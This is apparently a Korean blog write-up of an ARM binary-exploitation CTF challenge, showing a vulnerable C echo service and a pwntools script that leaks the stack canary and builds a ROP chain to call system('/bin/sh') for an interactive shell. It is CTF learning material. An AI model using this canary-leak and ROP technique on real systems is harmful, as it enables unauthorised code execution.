ARM Pwnable문제다. ARM 포너블은 처음 잡아봤다.
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
int main()
{
setbuf(stdout, NULL);
setbuf(stdin, NULL);
char buf[40];
puts("Welcome to hxp's Echo Service!");
while (1)
{
printf("> ");
ssize_t len = read(0, buf, 0x60);
if (len <= 0) return 0;
if (buf[len - 1] == '\n') buf[--len] = 0;
if (len == 0) return 0;
puts(buf);
}
}
const void* foo = system;
exploit.py
from pwn import *
context.log_level = 'debug'
e = ELF('./canary')
p = process('./canary')
p.sendafter('> ','A'*41)
p.recvuntil('A'*40)
canary = u32(p.recv(4)) - 0x41
binsh = 0x71EB0
system = 0x16d90
popret = 0x00026b7c # pop {r0, r4, pc}
payload = 'A'*40
payload += p32(canary)
payload += 'A'*12
payload += p32(popret)
payload += p32(binsh)
payload += 'A'*4
payload += p32(system)
p.sendafter('> ',payload)
p.sendlineafter('> ','')
p.interactive()
'Hacking' 카테고리의 다른 글
| GDB (0) | 2019.12.13 |
|---|---|
| LODWORD, LOBYTE (0) | 2019.12.13 |
| [2019정보보호올림피아드]Q9 (0) | 2019.11.25 |
| syscall Exploit 예제 (0) | 2019.11.23 |
| CVE-2019-14287 발표 자료 (0) | 2019.11.23 |